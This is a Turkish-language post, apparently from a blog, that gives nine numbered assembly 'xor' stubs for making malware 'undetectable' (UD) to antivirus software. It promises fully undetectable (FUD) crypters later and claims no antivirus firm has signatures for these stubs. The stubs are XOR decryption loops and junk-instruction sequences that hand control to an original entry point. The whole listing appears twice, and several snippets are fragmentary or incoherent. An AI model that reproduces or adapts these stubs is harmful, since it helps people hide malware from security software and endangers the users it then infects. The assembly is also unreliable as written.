UD Yapımı için gerekli olan xor kodlarını veriyorum buyrun
bunlarla FUD bile yapılır ama ilerleyen vakitlerde onlarıda göstericez arkadaşlar şuan temellerini öğrenelim
Cevap Yazdiginiz için tesekkürler. 1-xor
-------------------------
PUSHAD
MOV BL,88
NEG BL
ROR BL,4
NOT BL
xor BL,AL
NOT BL
ROR BL,4
NEG BL
PUSH 1
PUSH 1
MOV EAX,{Anfang}
INC BL
L013:
xor [BYTE DS:EAX],BL
INC EAX
DEC EAX
INC EAX
CMP EAX,{Ende}
JLE L013
JMP OEP
POPAD
PUSH 1
PUSH 1
2-xor
-------------------------
PUSH EAX [ N.E.P ]
PUSH ECX
PUSH ESP
PUSH EBP
PUSH 24
PUSH 21
PUSH [OEP]
CALL [ CALL ]
PUSH ESI
PUSH EBX
CALL ESI
CALL EBX
CALL ESP
CALL ECX
CALL EAX
PUSH 20
RETN
3-xor
-------------------------
DEC ECX
DEC EAX
PUSH EBP
MOV EBP,ESP
PUSH (DEC ECX)
PUSH 99
PUSH 11
PUSH (DEC EAX)
PUSH (Anfang PUSH )
CALL (Anfang CALL )
4-xor
-------------------------
PUSH ESP
PUSH EBP
PUSH EDX
PUSH ECX
NEG EAX
PUSH(Orginal entrypoint)
CALL(orginal call entrypoint)
XCHG DH, CH
PUSH 3788
PUSH 3764
PUSH 3768
PUSH 3772
PUSH 3531
CALL EAX
CALL ESI
CALL EBX
NOT EAX
xor EAX,EDI
xor CH,DH
INC ESI
DEC EBP
CALL ESP
JMP (xor EAX,EDI entrypoint)
JLE (xor CH,DH Entrypoint)
ROR AL,6
NOT EAX
PUSH 0
RETN
5-xor
-------------------------
PUSH EBP
MOV EBP, ESP
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI, ESP
PUSH DWORD PTR SS:[EBP+14]
PUSH DWORD PTR SS:[EBP+10]
PUSH DWORD PTR SS:[EBP+C]
CALL NEAR DWORD PTR SS:[EBP+8]
MOV ESP, ESI
POP EBX
POP EDI
POP ESI
POP EBP
RETN 10
6-xor
-------------------------
xor bl,bl
mov eax,(First)
inc bl
xor byte ptr ds:[eax],bl
inc eax
cmp eax,(Last)
jle (xor)
Push (OEP)
Call (JMP or CALL)
7-xor
-------------------------
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], CH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
dec ecx
push ecx
push eax
xor bl,bl
xor cl,cl
push 414
push oep
call oep
dec ecx
xor bl,bl
retn
8-xor
-------------------------
CMP AX,8
PUSH EAX
MOV EAX,EBP
PUSH (o.e.p)
PUSH 88
PUSH 77
PUSH (o.e.p)
CALL (call)
9-xor
-------------------------
PUSH ESP
xor EAX,ESI
POP EAX
INC EAX
xor EDX,ESP
POP EAX
NOT EAX
ADD EAX,ESI
JMP (Baslangıc.E.P)
PUSH 4
SUB EAX, 6
JLE (xor EAX,ESI)değeri
RETN
Not : Hiçbir antivirüs firmasında imzası bulunmamaktadır.
bunlarla FUD bile yapılır ama ilerleyen vakitlerde onlarıda göstericez arkadaşlar şuan temellerini öğrenelim
Cevap Yazdiginiz için tesekkürler. 1-xor
-------------------------
PUSHAD
MOV BL,88
NEG BL
ROR BL,4
NOT BL
xor BL,AL
NOT BL
ROR BL,4
NEG BL
PUSH 1
PUSH 1
MOV EAX,{Anfang}
INC BL
L013:
xor [BYTE DS:EAX],BL
INC EAX
DEC EAX
INC EAX
CMP EAX,{Ende}
JLE L013
JMP OEP
POPAD
PUSH 1
PUSH 1
2-xor
-------------------------
PUSH EAX [ N.E.P ]
PUSH ECX
PUSH ESP
PUSH EBP
PUSH 24
PUSH 21
PUSH [OEP]
CALL [ CALL ]
PUSH ESI
PUSH EBX
CALL ESI
CALL EBX
CALL ESP
CALL ECX
CALL EAX
PUSH 20
RETN
3-xor
-------------------------
DEC ECX
DEC EAX
PUSH EBP
MOV EBP,ESP
PUSH (DEC ECX)
PUSH 99
PUSH 11
PUSH (DEC EAX)
PUSH (Anfang PUSH )
CALL (Anfang CALL )
4-xor
-------------------------
PUSH ESP
PUSH EBP
PUSH EDX
PUSH ECX
NEG EAX
PUSH(Orginal entrypoint)
CALL(orginal call entrypoint)
XCHG DH, CH
PUSH 3788
PUSH 3764
PUSH 3768
PUSH 3772
PUSH 3531
CALL EAX
CALL ESI
CALL EBX
NOT EAX
xor EAX,EDI
xor CH,DH
INC ESI
DEC EBP
CALL ESP
JMP (xor EAX,EDI entrypoint)
JLE (xor CH,DH Entrypoint)
ROR AL,6
NOT EAX
PUSH 0
RETN
5-xor
-------------------------
PUSH EBP
MOV EBP, ESP
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI, ESP
PUSH DWORD PTR SS:[EBP+14]
PUSH DWORD PTR SS:[EBP+10]
PUSH DWORD PTR SS:[EBP+C]
CALL NEAR DWORD PTR SS:[EBP+8]
MOV ESP, ESI
POP EBX
POP EDI
POP ESI
POP EBP
RETN 10
6-xor
-------------------------
xor bl,bl
mov eax,(First)
inc bl
xor byte ptr ds:[eax],bl
inc eax
cmp eax,(Last)
jle (xor)
Push (OEP)
Call (JMP or CALL)
7-xor
-------------------------
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], CH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
dec ecx
push ecx
push eax
xor bl,bl
xor cl,cl
push 414
push oep
call oep
dec ecx
xor bl,bl
retn
8-xor
-------------------------
CMP AX,8
PUSH EAX
MOV EAX,EBP
PUSH (o.e.p)
PUSH 88
PUSH 77
PUSH (o.e.p)
CALL (call)
9-xor
-------------------------
PUSH ESP
xor EAX,ESI
POP EAX
INC EAX
xor EDX,ESP
POP EAX
NOT EAX
ADD EAX,ESI
JMP (Baslangıc.E.P)
PUSH 4
SUB EAX, 6
JLE (xor EAX,ESI)değeri
RETN
Not : Hiçbir antivirüs firmasında imzası bulunmamaktadır.
0 yorum:
Yorum Gönder